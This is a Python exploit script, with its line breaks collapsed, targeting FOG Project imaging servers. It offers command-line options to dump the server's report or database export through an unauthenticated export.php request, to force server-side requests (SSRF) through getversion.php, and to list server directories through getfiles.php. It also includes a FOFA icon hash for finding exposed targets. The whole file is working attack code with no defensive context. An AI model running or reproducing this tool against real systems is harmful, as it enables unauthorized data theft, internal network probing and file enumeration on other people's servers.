import requests import argparse import sys from urllib.parse import quote # FOFA search icon_hash="-1952619005" def print_cred(): print("[*] Fog project exploit by casp3r0x0 hassan al-khafaji") print("[*] GitHub: https://github.com/casp3r0x0") def EXPDump(target): # Implementation for exploit dump functionality print(f"[+] Target: {target}") print("[+] Dumping...") burp0_url = f"{target}/fog/management/export.php?filename=HistoryReport&type=pdf" burp0_cookies = {"PHPSESSID": ""} burp0_headers = {"X-Requested-With": "XMLHttpRequest", "Accept-Language": "en-US,en;q=0.9", "Accept": "application/json, text/javascript, */*; q=0.01", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36", "Origin": "http://192.168.43.133", "Referer": "http://192.168.43.133/fog/management/index.php?node=report&sub=file&f=aGlzdG9yeSByZXBvcnQ%3D", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"} burp0_data = {"fogguiuser": '', "fogguipass": '', "nojson": "4", "export": "3"} x = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False) x.raise_for_status() with open("output.txt", "w", encoding="utf-8") as f: f.write(x.text) print("[+] Dumped saved to output.txt") def SSRF(target, url): # Implementation for SSRF functionality print(f"[+] Target: {target}") print(f"[+] SSRF URL: {url}") burp0_url = f"{target}/fog/service/getversion.php?url={quote(url)}" burp0_cookies = {"PHPSESSID": ""} burp0_headers = {"X-Requested-With": "XMLHttpRequest", "Accept-Language": "en-US,en;q=0.9", "Accept": "application/json, text/javascript, */*; q=0.01", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36", "Origin": "http://192.168.43.133", "Referer": "http://192.168.43.133/fog/management/index.php?node=report&sub=file&f=aGlzdG9yeSByZXBvcnQ%3D", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"} res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies, verify=False) res.raise_for_status() print("[+] SSRF request sent") def listfiles(target, path): # Implementation for list files functionality print(f"[+] Target: {target}") print(f"[+] Path: {path}") burp0_url = f"{target}/fog/status/getfiles.php?path={path}" burp0_cookies = {"PHPSESSID": ""} burp0_headers = {"X-Requested-With": "XMLHttpRequest", "Accept-Language": "en-US,en;q=0.9", "Accept": "application/json, text/javascript, */*; q=0.01", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36", "Origin": "http://192.168.43.133", "Referer": "http://192.168.43.133/fog/management/index.php?node=report&sub=file&f=aGlzdG9yeSByZXBvcnQ%3D", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"} res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies, verify=False) res.raise_for_status() print("[+] List files request sent") print(res.text) def main(): parser = argparse.ArgumentParser(description="Exploit tool for FOGProject system by Casp3r0x0 Hassan Ali Al-khafaji") parser.add_argument("-t", "--target", required=True, help="Target URL (mandatory)") parser.add_argument("--dump", action="store_true", help="dump full db from the target") parser.add_argument("--SSRF", metavar="URL", help="Execute SSRF function with specified URL") parser.add_argument("--listfiles", metavar="PATH", help="Execute listfiles function with specified path") args = parser.parse_args() # Check if at least one action is specified if not any([args.dump, args.SSRF, args.listfiles]): print("Error: At least one action must be specified (--dump, --SSRF, or --listfiles)") parser.print_help() sys.exit(1) target = args.target if args.dump: print_cred() EXPDump(target) if args.SSRF: print_cred() SSRF(target, args.SSRF) if args.listfiles: print_cred() listfiles(target, args.listfiles) if __name__ == "__main__": main()